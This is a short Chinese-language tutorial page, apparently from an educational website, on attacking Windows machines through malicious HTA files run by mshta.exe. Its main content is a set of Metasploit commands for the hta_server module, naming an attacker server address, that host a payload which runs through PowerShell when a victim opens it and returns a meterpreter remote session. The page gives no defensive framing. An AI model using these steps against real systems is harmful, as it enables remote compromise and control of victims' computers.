数据结构
网络
RDBMS
操作系统
Java
MS Excel
iOS
HTML
CSS
Android
Python
C 编程
C++
C#
MongoDB
MySQL
Javascript
PHP
物理
化学
生物
数学
英语
经济学
心理学
社会研究
时装研究
法律研究使用 HTA 文件(MSHTA.exe)黑客
负责运行 HTA(HTML 应用程序)文件的 Windows 操作系统实用程序,我们可以在 JavaScript 或 VBScript 中使用这些实用程序。你可以使用 Microsoft MSHTA.exe 工具解释这些文件。
Metasploit 包含“HTA Web 服务器”模块,该模块生成恶意 hta 文件。此模块托管一个 HTML 应用程序(HTA),在打开后将通过 Powershell 运行有效负载。
恶意 HTA 文件
在 Kali Linux 中打开 Metasploit 并输入以下命令,以生成恶意 HTA 文件,例如;
- use exploit/windows/misc/hta_server
- set srvhost 192.168.1.109
- set lhost 192.168.1.109
- exploit
现在,通过受害者计算机上的mshta.exe ,在目标计算机上运行恶意代码,来获取 meterpreter 会话。
更新于:2020-09-23
2K+ 次浏览
广告